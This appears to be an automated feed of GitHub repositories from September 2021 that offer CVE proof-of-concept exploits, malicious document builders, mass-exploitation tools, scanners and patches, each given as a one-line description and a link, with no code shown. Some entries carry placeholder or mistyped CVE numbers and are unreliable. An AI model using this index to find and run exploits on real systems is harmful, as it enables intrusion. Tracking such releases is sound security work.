**PoC for exploiting CVE-2021-28553 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by an Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28553](https://github.com/AlAIAL90/CVE-2021-28553) create time: 2021-09-15T15:57:44Z

**PoC for exploiting CVE-2021-28550 : Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-28550](https://github.com/AlAIAL90/CVE-2021-28550) create time: 2021-09-15T15:57:41Z

**no description** : [artsking/linux-3.0.35_CVE-2020-36386_withPatch](https://github.com/artsking/linux-3.0.35_CVE-2020-36386_withPatch) create time: 2021-09-15T10:38:52Z

**no description** : [madhans23/kernel_imx_4.1.15-CVE-2020-36386_noPatch](https://github.com/madhans23/kernel_imx_4.1.15-CVE-2020-36386_noPatch) create time: 2021-09-15T10:15:40Z

**CVE-2021-33766-poc** : [demossl/CVE-2021-33766-ProxyToken](https://github.com/demossl/CVE-2021-33766-ProxyToken) create time: 2021-09-15T09:09:20Z

**no description** : [jaysharma786/CVE-2021-29003](https://github.com/jaysharma786/CVE-2021-29003) create time: 2021-09-15T06:14:47Z

**no description** : [security-dbg/CVE-2021-21220](https://github.com/security-dbg/CVE-2021-21220) create time: 2021-09-15T03:11:41Z

**CVE-2018-15473 Exploit** : [MrDottt/CVE-2018-15473](https://github.com/MrDottt/CVE-2018-15473) create time: 2021-09-14T23:20:52Z

**Scans Microsoft office documents for malicious xml entries** : [InfoSecPolkCounty/CVE2021-40444-document-Scanner](https://github.com/InfoSecPolkCounty/CVE2021-40444-document-Scanner) create time: 2021-09-14T19:59:53Z

**no description** : [k8gege/CVE-2021-40444](https://github.com/k8gege/CVE-2021-40444) create time: 2021-09-14T17:10:48Z

**Multiple SQL Inejection Vulnerability in Support Board Version 3.3.3 that allow remote unauthenticated attacker to execute arbitrary SQL commands via status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id parameters to ajax.php which is connected to functions.php which the vulnerability is present.** : [itsjeffersonli/CVE-2021-24741](https://github.com/itsjeffersonli/CVE-2021-24741) create time: 2021-08-28T18:34:40Z

**partly working PoC, check lockedbytes PoC for full experience!** : [js-on/CVE-2021-40444](https://github.com/js-on/CVE-2021-40444) create time: 2021-09-14T13:45:36Z

**Here you can find my relation about the project I made for the Internet Security course. Because I written it in Latex, you can also find the Latex source files. The project talks about Maltego vulnerability CVE-2020-24656, which allows an attacker to exfiltrate data via an XXE injection attack.** : [terzinodipaese/Internet-Security-Project](https://github.com/terzinodipaese/Internet-Security-Project) create time: 2021-09-14T11:33:12Z

**no description** : [mr-r3b00t/2021-BadPewCVEs](https://github.com/mr-r3b00t/2021-BadPewCVEs) create time: 2021-09-14T11:38:33Z

**CVE-2021-32202** : [l00neyhacker/CVE-2021-32202](https://github.com/l00neyhacker/CVE-2021-32202) create time: 2021-09-14T03:19:37Z

**CVE-2021-36582** : [l00neyhacker/CVE-2021-36582](https://github.com/l00neyhacker/CVE-2021-36582) create time: 2021-09-14T03:14:50Z

**CVE-2021-36581** : [l00neyhacker/CVE-2021-36581](https://github.com/l00neyhacker/CVE-2021-36581) create time: 2021-09-14T03:09:34Z

**no description** : [aydianosec/CVE2021-40444](https://github.com/aydianosec/CVE2021-40444) create time: 2021-09-14T01:37:25Z

**CSRF in Qloapps HotelCommerce 1.5.1** : [dillonkirsch/CVE-2021-41074](https://github.com/dillonkirsch/CVE-2021-41074) create time: 2021-09-13T19:55:57Z

**POC for CVE-2021-40444** : [khoaduynu/CVE-2021-40444](https://github.com/khoaduynu/CVE-2021-40444) create time: 2021-09-13T09:46:04Z

**no description** : [Immersive-Labs-Sec/cve-2021-40444-analysis](https://github.com/Immersive-Labs-Sec/cve-2021-40444-analysis) create time: 2021-09-09T15:43:08Z

**no description** : [sDreamForZzQ/CVE-2021-1234](https://github.com/sDreamForZzQ/CVE-2021-1234) create time: 2021-09-13T09:16:55Z

**no description** : [sDreamForZzQ/CVE-2021-74123](https://github.com/sDreamForZzQ/CVE-2021-74123) create time: 2021-09-13T05:29:44Z

**test** : [cckuailong/CVE-2021-1234](https://github.com/cckuailong/CVE-2021-1234) create time: 2021-09-13T05:06:48Z

**no description** : [sDreamForZzQ/CVE-2021-7799](https://github.com/sDreamForZzQ/CVE-2021-7799) create time: 2021-09-13T05:05:59Z

**Exploitation of CVE-2018-18925 a Remote Code Execution against the Git self hosted tool: Gogs.** : [RyouYoo/CVE-2018-18925](https://github.com/RyouYoo/CVE-2018-18925) create time: 2021-09-12T17:57:56Z

**This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit** : [aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders) create time: 2021-09-12T18:05:53Z

**Mass exploitation of CVE-2021-24499 unauthenticated upload leading to remote code execution in Workreap theme.** : [RyouYoo/CVE-2021-24499](https://github.com/RyouYoo/CVE-2021-24499) create time: 2021-09-12T12:43:24Z

**Python implementation for CVE-2021-1675 / CVE-2021-34527** : [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare) create time: 2021-09-12T12:31:39Z

**2021 kernel vulnerability in Ubuntu** : [cerodah/overlayFS-CVE-2021-3493](https://github.com/cerodah/overlayFS-CVE-2021-3493) create time: 2021-09-12T12:25:02Z

**Python Implementation for CVE-2021-1675 / CVE-2021-34527** : [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare) create time: 2021-09-11T00:16:40Z

**Reverse engineering the "A Letter Before Court 4.docx" malicious files exploting cve-2021-40444** : [jamesrep/cve-2021-40444](https://github.com/jamesrep/cve-2021-40444) create time: 2021-09-12T09:27:40Z

**no description** : [R0fM1a/CVE-2021-40444-pocv](https://github.com/R0fM1a/CVE-2021-40444-pocv) create time: 2021-09-12T00:25:14Z

**Demo for CVE-2021-40444** : [kozmer/CVE-2021-40444](https://github.com/kozmer/CVE-2021-40444) create time: 2021-09-11T17:39:25Z

**A malicious .cab creation tool for CVE-2021-40444** : [mansk1es/Caboom](https://github.com/mansk1es/Caboom) create time: 2021-09-11T16:31:05Z

**Malicious document builder for CVE-2021-40444** : [amartinsec/MSHTHell](https://github.com/amartinsec/MSHTHell) create time: 2021-09-11T15:33:41Z

**Updating all CVE-details from the year 1999 to 2021** : [techyrick/CVE-list](https://github.com/techyrick/CVE-list) create time: 2021-09-11T14:06:01Z

**Hunting CVE-2018-13379** : [nivdolgin/CVE-2018-13379](https://github.com/nivdolgin/CVE-2018-13379) create time: 2021-09-11T13:12:31Z

**no description** : [nightrelax/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx](https://github.com/nightrelax/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx) create time: 2021-09-11T09:21:29Z

**Strapi Remote Code Execution** : [D3m0nicw0lf/CVE-2019-19609](https://github.com/D3m0nicw0lf/CVE-2019-19609) create time: 2021-09-11T06:53:33Z

**CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability** : [FanqXu/CVE-2021-40444](https://github.com/FanqXu/CVE-2021-40444) create time: 2021-09-11T04:13:12Z

**no description** : [Lagal1990/CVE-2021-40444-docx-Generate](https://github.com/Lagal1990/CVE-2021-40444-docx-Generate) create time: 2021-09-11T02:56:23Z

**no description** : [fengjixuchui/CVE-2021-40444-docx-Generate](https://github.com/fengjixuchui/CVE-2021-40444-docx-Generate) create time: 2021-09-11T02:49:37Z

**no description** : [alikarimi999/CVE-2021-40346](https://github.com/alikarimi999/CVE-2021-40346) create time: 2021-09-10T23:02:45Z

**EternalBlueTrojan(CVE-2017-0144)** : [Ali-Imangholi/EternalBlueTrojan](https://github.com/Ali-Imangholi/EternalBlueTrojan) create time: 2021-09-10T18:18:53Z

**Reproduce steps for CVE-2021-40444** : [lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444) create time: 2021-09-10T16:55:53Z

**Event logs from running CVE-2021-40444 samples** : [zaneGittins/CVE-2021-40444-evtx](https://github.com/zaneGittins/CVE-2021-40444-evtx) create time: 2021-09-10T15:36:43Z

**no description** : [ricardojoserf/CVE-2021-40845](https://github.com/ricardojoserf/CVE-2021-40845) create time: 2021-09-10T10:23:55Z

**CVE-2021-40444 Sample** : [Udyz/CVE-2021-40444-Sample](https://github.com/Udyz/CVE-2021-40444-Sample) create time: 2021-09-10T09:43:41Z

**CVE-2021-40346 integer overflow enables http smuggling** : [donky16/CVE-2021-40346-POC](https://github.com/donky16/CVE-2021-40346-POC) create time: 2021-09-10T08:18:20Z

**no description** : [vysecurity/CVE-2021-40444](https://github.com/vysecurity/CVE-2021-40444) create time: 2021-09-09T23:41:52Z

**Something I wrote for CVE-2019-15107, a Webmin backdoor** : [darrenmartyn/CVE-2019-15107](https://github.com/darrenmartyn/CVE-2019-15107) create time: 2021-09-09T16:26:40Z

**CVE-2020-9054 PoC for Zyxel** : [darrenmartyn/CVE-2020-9054](https://github.com/darrenmartyn/CVE-2020-9054) create time: 2021-09-09T16:16:34Z

**no description** : [twentybel0w/CVE-2020-25233](https://github.com/twentybel0w/CVE-2020-25233) create time: 2021-09-09T15:58:08Z

**TP Seguridad Informática** : [fran-CICS/ExploitTensorflowCVE-2021-37678](https://github.com/fran-CICS/ExploitTensorflowCVE-2021-37678) create time: 2021-09-09T12:55:55Z

**Confluence OGNL injection** : [dorkerdevil/CVE-2021-26084](https://github.com/dorkerdevil/CVE-2021-26084) create time: 2021-09-09T06:19:13Z

**no description** : [itom-qe/itom-qe-2021-09-08-T-21-09-456-cveaj](https://github.com/itom-qe/itom-qe-2021-09-08-T-21-09-456-cveaj) create time: 2021-09-09T04:01:42Z

**no description** : [rfcxv/CVE-2021-40444-POC](https://github.com/rfcxv/CVE-2021-40444-POC) create time: 2021-09-09T03:15:57Z

**CVE-2021-40346 PoC (HAProxy HTTP Smuggling)** : [knqyf263/CVE-2021-40346](https://github.com/knqyf263/CVE-2021-40346) create time: 2021-09-08T22:26:19Z

**CVE-2021-26084 patch as provided in "Confluence Security Advisory - 2021-08-25"** : [nizarbamida/CVE-2021-26084-patch-](https://github.com/nizarbamida/CVE-2021-26084-patch-) create time: 2021-09-08T17:05:16Z

**Exploit chain for CVE-2019-9791 & CVE-2019-11708 against firefox 65.0 on windows 64bit** : [Sp0pielar/CVE-2019-9791](https://github.com/Sp0pielar/CVE-2019-9791) create time: 2021-09-08T14:38:42Z

**Patched Confluence 7.12.2 (CVE-2021-26084)** : [toowoxx/docker-confluence-patched](https://github.com/toowoxx/docker-confluence-patched) create time: 2021-09-08T14:35:37Z

**Exploit CVE 2021 26084 Confluence** : [dock0d1/CVE-2021-26084_Confluence](https://github.com/dock0d1/CVE-2021-26084_Confluence) create time: 2021-09-08T11:01:49Z

**Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444** : [ozergoker/CVE-2021-40444](https://github.com/ozergoker/CVE-2021-40444) create time: 2021-09-08T08:32:40Z

**no description** : [Edgarloyola/CVE-2021-36563](https://github.com/Edgarloyola/CVE-2021-36563) create time: 2021-07-27T11:22:21Z

**PoC for exploiting CVE-2021-21409 : Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final.** : [AlAIAL90/CVE-2021-21409](https://github.com/AlAIAL90/CVE-2021-21409) create time: 2021-09-07T23:01:56Z

**PoC for exploiting CVE-2021-39371 : An XML external entity (XXE) injection in PyWPS before 4.5.0 allows an attacker to view files on the application server filesystem by assigning a path to the entity. OWSLib 0.24.1 may also be affected.** : [AlAIAL90/CVE-2021-39371](https://github.com/AlAIAL90/CVE-2021-39371) create time: 2021-09-07T23:01:49Z

**PoC for exploiting CVE-2019-10172 : A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.** : [AlAIAL90/CVE-2019-10172](https://github.com/AlAIAL90/CVE-2019-10172) create time: 2021-09-07T21:51:57Z

**PoC for exploiting CVE-2021-40153 : squashfs_opendir in unsquash-1.c in Squashfs-Tools 4.5 stores the filename in the directory entry; this is then used by unsquashfs to create the new file during the unsquash. The filename is not validated for traversal outside of the destination directory, and thus allows writing to locations outside of the destination.** : [AlAIAL90/CVE-2021-40153](https://github.com/AlAIAL90/CVE-2021-40153) create time: 2021-09-07T21:52:34Z

**PoC for exploiting CVE-2021-28700 : xen/arm: No memory limit for dom0less domUs The dom0less feature allows an administrator to create multiple unprivileged domains directly from Xen. Unfortunately, the memory limit from them is not set. This allow a domain to allocate memory beyond what an administrator originally configured.** : [AlAIAL90/CVE-2021-28700](https://github.com/AlAIAL90/CVE-2021-28700) create time: 2021-09-07T21:52:30Z

**PoC for exploiting CVE-2021-38173 : Btrbk before 0.31.2 allows command execution because of the mishandling of remote hosts filtering SSH commands using ssh_filter_btrbk.sh in authorized_keys.** : [AlAIAL90/CVE-2021-38173](https://github.com/AlAIAL90/CVE-2021-38173) create time: 2021-09-07T21:52:08Z

**PoC for exploiting CVE-2021-29484 : Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. Ghost(Pro) has already been patched. We can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added. Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.3.2. Immediate action should be taken to secure your site. The issue has been fixed in 4.3.3, all 4.x sites should upgrade as soon as possible. As the endpoint is unused, the patch simply removes it. As a workaround blocking access to /ghost/preview can also mitigate the issue.** : [AlAIAL90/CVE-2021-29484](https://github.com/AlAIAL90/CVE-2021-29484) create time: 2021-09-07T21:52:01Z

**PoC for exploiting CVE-2021-33560 : Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.** : [AlAIAL90/CVE-2021-33560](https://github.com/AlAIAL90/CVE-2021-33560) create time: 2021-09-07T21:51:53Z

**Template Injection in Email Templates leads to code execution on Jira Service Management Server** : [PetrusViet/CVE-2021-39115](https://github.com/PetrusViet/CVE-2021-39115) create time: 2021-09-07T09:03:35Z

**Modified Verion of CVE-2016-0792** : [Aviksaikat/CVE-2016-0792](https://github.com/Aviksaikat/CVE-2016-0792) create time: 2021-09-07T13:14:16Z

**no description** : [alikarimi999/CVE-2021-21315](https://github.com/alikarimi999/CVE-2021-21315) create time: 2021-09-07T14:31:20Z

**Proof of Concept for CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207** : [horizon3ai/proxyshell](https://github.com/horizon3ai/proxyshell) create time: 2021-09-04T15:34:03Z

**A quick and dirty PoC of cve-2010-26084 as none of the existing ones worked for me.** : [GlennPegden2/cve-2021-26084-confluence](https://github.com/GlennPegden2/cve-2021-26084-confluence) create time: 2021-09-07T12:04:09Z

**no description** : [artsking/sqlite-3.22.0_CVE-2019-20218_withPatch](https://github.com/artsking/sqlite-3.22.0_CVE-2019-20218_withPatch) create time: 2021-09-07T06:50:17Z

**Atlassian Confluence CVE-2021-26084 one-liner mass checker** : [1ZRR4H/CVE-2021-26084](https://github.com/1ZRR4H/CVE-2021-26084) create time: 2021-09-07T01:15:16Z

**no description** : [steefn/cve2018-6574](https://github.com/steefn/cve2018-6574) create time: 2021-09-06T13:55:42Z

**A vulnerability can allow an attacker to guess the automatically generated development mode secret token.** : [RyouYoo/CVE-2019-5420](https://github.com/RyouYoo/CVE-2019-5420) create time: 2021-09-06T12:28:05Z

**CVE-2021-36798 Exp: Cobalt Strike < 4.4 dos** : [JamVayne/CobaltStrikeDos](https://github.com/JamVayne/CobaltStrikeDos) create time: 2021-09-06T11:49:03Z

**Exploitation of CVE-2019-5420 to forge a session as another user.** : [RyouYoo/CVE-2019-5420](https://github.com/RyouYoo/CVE-2019-5420) create time: 2021-09-06T09:17:22Z

**asjhdsajdlksavksapfoka** : [p1gz/CVE-2021-26084-Confluence-OGNL](https://github.com/p1gz/CVE-2021-26084-Confluence-OGNL) create time: 2021-09-06T06:55:15Z

**no description** : [Y3A/CVE-2021-3156](https://github.com/Y3A/CVE-2021-3156) create time: 2021-09-06T06:48:08Z

**CVE-2021-34371.jar** : [zwjjustdoit/CVE-2021-34371.jar](https://github.com/zwjjustdoit/CVE-2021-34371.jar) create time: 2021-09-06T02:00:52Z

**no description** : [Prodrious/CVE-2020-13942](https://github.com/Prodrious/CVE-2020-13942) create time: 2021-09-05T16:39:19Z

**Confluence server webwork OGNL injection** : [rootsmadi/CVE-2021-26084](https://github.com/rootsmadi/CVE-2021-26084) create time: 2021-09-05T09:27:55Z

**Wordpress Plainview Activity Monitor Plugin RCE (20161228)** : [Cinnamon1212/CVE-2018-15877-RCE](https://github.com/Cinnamon1212/CVE-2018-15877-RCE) create time: 2021-09-04T19:39:18Z

**User enumeration wordpress.** : [kr4dd/CVE-2017-5487](https://github.com/kr4dd/CVE-2017-5487) create time: 2021-09-04T15:20:35Z

**no description** : [Anonimo501/SMBGhost_CVE-2020-0796_checker](https://github.com/Anonimo501/SMBGhost_CVE-2020-0796_checker) create time: 2021-09-04T15:07:15Z

**Setting up POC for CVE-2021-26084** : [wolf1892/confluence-rce-poc](https://github.com/wolf1892/confluence-rce-poc) create time: 2021-09-04T14:53:38Z

**CVE-2021-34646 PoC** : [motikan2010/CVE-2021-34646](https://github.com/motikan2010/CVE-2021-34646) create time: 2021-09-04T14:19:05Z

**Exploitation of a vulnerability in Cisco's node-jose, a JavaScript library created to manage JWT.** : [RyouYoo/CVE-2018-0114](https://github.com/RyouYoo/CVE-2018-0114) create time: 2021-09-03T13:11:28Z

**Confluence OGNL Injection [CVE-2021-26084].** : [march0s1as/CVE-2021-26084](https://github.com/march0s1as/CVE-2021-26084) create time: 2021-09-04T13:32:42Z

**Blind SQL Injection in ClinicCases 7.3.3** : [sudonoodle/CVE-2021-38706](https://github.com/sudonoodle/CVE-2021-38706) create time: 2021-09-03T20:46:11Z

**Persistent Cross-Site Scripting (XSS) in ClinicCases 7.3.3** : [sudonoodle/CVE-2021-38707](https://github.com/sudonoodle/CVE-2021-38707) create time: 2021-09-03T20:44:20Z

**Cross-Site Request Forgery (CSRF) in ClinicCases 7.3.3** : [sudonoodle/CVE-2021-38705](https://github.com/sudonoodle/CVE-2021-38705) create time: 2021-09-03T20:42:43Z

**Reflected Cross-Site Scripting (XSS) in ClinicCases 7.3.3** : [sudonoodle/CVE-2021-38704](https://github.com/sudonoodle/CVE-2021-38704) create time: 2021-09-03T20:41:58Z

**no description** : [BabyTeam1024/cve-2018-2628](https://github.com/BabyTeam1024/cve-2018-2628) create time: 2021-09-04T07:22:46Z

**CVE-2020-6418 제로데이 취약점** : [CYB3R-X3eRo0/CVE-2020-6418](https://github.com/CYB3R-X3eRo0/CVE-2020-6418) create time: 2021-09-04T04:47:10Z

**A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution** : [JohnHammond/CVE-2012-2982](https://github.com/JohnHammond/CVE-2012-2982) create time: 2021-09-04T04:01:56Z

**PoC for exploiting CVE-2020-28020 : Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction.** : [AlAIAL90/CVE-2020-28020](https://github.com/AlAIAL90/CVE-2020-28020) create time: 2021-09-03T22:56:13Z

**PoC for exploiting CVE-2020-15744 : Stack-based Buffer Overflow vulnerability in the ONVIF server component of Victure PC420 smart camera allows an attacker to execute remote code on the target device. This issue affects: Victure PC420 firmware version 1.2.2 and prior versions.** : [AlAIAL90/CVE-2020-15744](https://github.com/AlAIAL90/CVE-2020-15744) create time: 2021-09-03T22:55:53Z

**PoC for exploiting CVE-2021-1588 : A vulnerability in the MPLS Operation, Administration, and Maintenance (OAM) feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation when an affected device is processing an MPLS echo-request or echo-reply packet. An attacker could exploit this vulnerability by sending malicious MPLS echo-request or echo-reply packets to an interface that is enabled for MPLS forwarding on the affected device. A successful exploit could allow the attacker to cause the MPLS OAM process to crash and restart multiple times, causing the affected device to reload and resulting in a DoS condition.** : [AlAIAL90/CVE-2021-1588](https://github.com/AlAIAL90/CVE-2021-1588) create time: 2021-09-03T22:57:06Z

**PoC for exploiting CVE-2021-1590 : A vulnerability in the implementation of the system login block-for command for Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a login process to unexpectedly restart, causing a denial of service (DoS) condition. This vulnerability is due to a logic error in the implementation of the system login block-for command when an attack is detected and acted upon. An attacker could exploit this vulnerability by performing a brute-force login attack on an affected device. A successful exploit could allow the attacker to cause a login process to reload, which could result in a delay during authentication to the affected device.** : [AlAIAL90/CVE-2021-1590](https://github.com/AlAIAL90/CVE-2021-1590) create time: 2021-09-03T22:57:02Z

**PoC for exploiting CVE-2021-1591 : A vulnerability in the EtherChannel port subscription logic of Cisco Nexus 9500 Series Switches could allow an unauthenticated, remote attacker to bypass access control list (ACL) rules that are configured on an affected device. This vulnerability is due to oversubscription of resources that occurs when applying ACLs to port channel interfaces. An attacker could exploit this vulnerability by attempting to access network resources that are protected by the ACL. A successful exploit could allow the attacker to access network resources that would be protected by the ACL that was applied on the port channel interface.** : [AlAIAL90/CVE-2021-1591](https://github.com/AlAIAL90/CVE-2021-1591) create time: 2021-09-03T22:56:58Z

**PoC for exploiting CVE-2021-1592 : A vulnerability in the way Cisco UCS Manager software handles SSH sessions could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper resource management for established SSH sessions. An attacker could exploit this vulnerability by opening a significant number of SSH sessions on an affected device. A successful exploit could allow the attacker to cause a crash and restart of internal Cisco UCS Manager software processes and a temporary loss of access to the Cisco UCS Manager CLI and web UI. Note: The attacker must have valid user credentials to authenticate to the affected device.** : [AlAIAL90/CVE-2021-1592](https://github.com/AlAIAL90/CVE-2021-1592) create time: 2021-09-03T22:56:54Z

**PoC for exploiting CVE-2021-32955 : Delta Electronics DIAEnergie Version 1.7.5 and prior allows unrestricted file uploads, which may allow an attacker to remotely execute code.** : [AlAIAL90/CVE-2021-32955](https://github.com/AlAIAL90/CVE-2021-32955) create time: 2021-09-03T22:56:51Z

**PoC for exploiting CVE-2021-32967 : Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.** : [AlAIAL90/CVE-2021-32967](https://github.com/AlAIAL90/CVE-2021-32967) create time: 2021-09-03T22:56:47Z

**PoC for exploiting CVE-2021-32991 : Delta Electronics DIAEnergie Version 1.7.5 and prior is vulnerable to cross-site request forgery, which may allow an attacker to cause a user to carry out an action unintentionally.** : [AlAIAL90/CVE-2021-32991](https://github.com/AlAIAL90/CVE-2021-32991) create time: 2021-09-03T22:56:44Z

**PoC for exploiting CVE-2021-33003 : Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to retrieve passwords in cleartext due to a weak hashing algorithm.** : [AlAIAL90/CVE-2021-33003](https://github.com/AlAIAL90/CVE-2021-33003) create time: 2021-09-03T22:56:40Z

**PoC for exploiting CVE-2021-32983 : A Blind SQL injection vulnerability exists in the /DataHandler/Handler_CFG.ashx endpoint of Delta Electronics DIAEnergie Version 1.7.5 and prior. The application does not properly validate the user-controlled value supplied through the parameter keyword before using it as part of an SQL query. A remote, unauthenticated attacker can exploit this issue to execute arbitrary code in the context of NT SERVICE\MSSQLSERVER.** : [AlAIAL90/CVE-2021-32983](https://github.com/AlAIAL90/CVE-2021-32983) create time: 2021-09-03T22:56:36Z

**PoC for exploiting CVE-2021-33007 : A heap-based buffer overflow in Delta Electronics TPEditor: v1.98.06 and prior may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code.** : [AlAIAL90/CVE-2021-33007](https://github.com/AlAIAL90/CVE-2021-33007) create time: 2021-09-03T22:56:32Z

**PoC for exploiting CVE-2021-33019 : A stack-based buffer overflow vulnerability in Delta Electronics DOPSoft Version 4.00.11 and prior may be exploited by processing a specially crafted project file, which may allow an attacker to execute arbitrary code.** : [AlAIAL90/CVE-2021-33019](https://github.com/AlAIAL90/CVE-2021-33019) create time: 2021-09-03T22:56:28Z

**PoC for exploiting CVE-2021-3628 : OpenKM Community Edition in its 6.3.10 version is vulnerable to authenticated Cross-site scripting (XSS). A remote attacker could exploit this vulnerability by injecting arbitrary code via de uuid parameter.** : [AlAIAL90/CVE-2021-3628](https://github.com/AlAIAL90/CVE-2021-3628) create time: 2021-09-03T22:56:24Z

**PoC for exploiting CVE-2021-39375 : Philips Healthcare Tasy Electronic Medical Record (EMR) 3.06 allows SQL injection via the WAdvancedFilter/getDimensionItemsByCode FilterValue parameter.** : [AlAIAL90/CVE-2021-39375](https://github.com/AlAIAL90/CVE-2021-39375) create time: 2021-09-03T22:56:21Z

**PoC for exploiting CVE-2021-27556 : The Cron job tab in EasyCorp ZenTao 12.5.3 allows remote attackers (who have admin access) to execute arbitrary code by setting the type parameter to System.** : [AlAIAL90/CVE-2021-27556](https://github.com/AlAIAL90/CVE-2021-27556) create time: 2021-09-03T22:56:17Z

**PoC for exploiting CVE-2021-24667 : A stored cross-site scripting vulnerability has been discovered in : Simply Gallery Blocks with Lightbox (Version – 2.2.0 & below). The vulnerability exists in the Lightbox functionality where a user with low privileges is allowed to execute arbitrary script code within the context of the application. This vulnerability is due to insufficient validation of image parameters in meta data.** : [AlAIAL90/CVE-2021-24667](https://github.com/AlAIAL90/CVE-2021-24667) create time: 2021-09-03T22:56:09Z

**PoC for exploiting CVE-2021-27913 : The function mt_rand is used to generate session tokens, this function is cryptographically flawed due to its nature being one pseudorandomness, an attacker can take advantage of the cryptographically insecure nature of this function to enumerate session tokens for accounts that are not under his/her control This issue affects: Mautic Mautic versions prior to 3.3.4; versions prior to 4.0.0.** : [AlAIAL90/CVE-2021-27913](https://github.com/AlAIAL90/CVE-2021-27913) create time: 2021-09-03T22:56:05Z

**PoC for exploiting CVE-2021-27912 : Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack when viewing Mautic assets by utilizing inline JS in the title and adding a broken image URL as a remote asset. This can only be leveraged by an authenticated user with permission to create or edit assets.** : [AlAIAL90/CVE-2021-27912](https://github.com/AlAIAL90/CVE-2021-27912) create time: 2021-09-03T22:56:01Z

**PoC for exploiting CVE-2021-37608 : Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz allows an attacker to execute remote commands. This issue affects Apache OFBiz version 17.12.07 and prior versions. Upgrade to at least 17.12.08 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12297.** : [AlAIAL90/CVE-2021-37608](https://github.com/AlAIAL90/CVE-2021-37608) create time: 2021-09-03T22:55:57Z

**Backporting CVE-2021-1748 patch for iOS <=14.3** : [ChiChou/mistune-patch-backport](https://github.com/ChiChou/mistune-patch-backport) create time: 2021-09-03T22:48:11Z

**CVE-2021-40492 Gibbon version 22 Reflected Cross Site Scripting (XSS)** : [5qu1n7/CVE-2021-40492](https://github.com/5qu1n7/CVE-2021-40492) create time: 2021-09-02T15:33:12Z

**cve-2021-26084 EXP** : [Xc1Ym/cve_2021_26084](https://github.com/Xc1Ym/cve_2021_26084) create time: 2021-09-03T08:22:21Z

**CVE-2021-26084 Confluence OGNL injection** : [Loneyers/CVE-2021-26084](https://github.com/Loneyers/CVE-2021-26084) create time: 2021-09-03T07:41:36Z

**OGNL Injection in Confluence server version < 7.12.5** : [mr-r3bot/Confluence-CVE-2021-26084](https://github.com/mr-r3bot/Confluence-CVE-2021-26084) create time: 2021-09-03T07:33:20Z

**no description** : [qiezi-maozi/CVE-2021-3019-Lanproxy](https://github.com/qiezi-maozi/CVE-2021-3019-Lanproxy) create time: 2021-09-03T05:24:41Z

**CVE-2021-26084** : [p0nymc1/CVE-2021-26084](https://github.com/p0nymc1/CVE-2021-26084) create time: 2021-09-03T05:14:46Z

**Dell Driver EoP (CVE-2021-21551)** : [ihack4falafel/Dell-Driver-EoP-CVE-2021-21551](https://github.com/ihack4falafel/Dell-Driver-EoP-CVE-2021-21551) create time: 2021-09-03T01:47:03Z

**Just testing if some bot will do some action here LOL** : [zeroc00I/CVE-2021-40353](https://github.com/zeroc00I/CVE-2021-40353) create time: 2021-09-02T17:03:26Z

**Remote code execution vulnerability in Ruby-on-Rails when using render on user-supplied data.** : [RyouYoo/CVE-2016-2098](https://github.com/RyouYoo/CVE-2016-2098) create time: 2021-08-31T15:25:41Z

**no description** : [wjryr/CVE-2021-2021](https://github.com/wjryr/CVE-2021-2021) create time: 2021-09-02T15:21:07Z

